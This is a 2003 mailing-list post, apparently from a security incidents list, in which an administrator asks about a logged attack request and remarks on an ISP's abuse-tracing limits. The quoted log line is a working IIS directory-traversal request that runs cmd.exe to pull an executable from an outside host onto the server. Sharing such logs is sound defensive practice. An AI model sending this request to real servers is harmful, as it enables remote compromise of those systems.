smsx.exe?

[Steve Bromwich <incident () fop ns ca>]

Hi,

Has anyone seen a request like this in their logs?

205.247.193.56 - - [05/May/2003:11:59:52 -0300]
"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+."

I tried rcping smsx.exe off the remote site but no joy; is the .adm an
obscure windows-specific port address or something? One of our windows
guys said the smsx was "remote management software", but had no idea about
the .adm...

On a side note, the response I got from energis (the 195.92.252.138 owner)
had the following at the start:

PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG

Further down:

Please note that if one of our IP addresses looks up to a 'webcache' (as
opposed to a modem) we have a *maximum* of 30 hours to trace the user
responsible for the abuse.

So I guess this means that Energis users have a pretty good chance of
abusing remote servers through Energis' web cache and getting away with it
:-/

Cheers, Steve

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------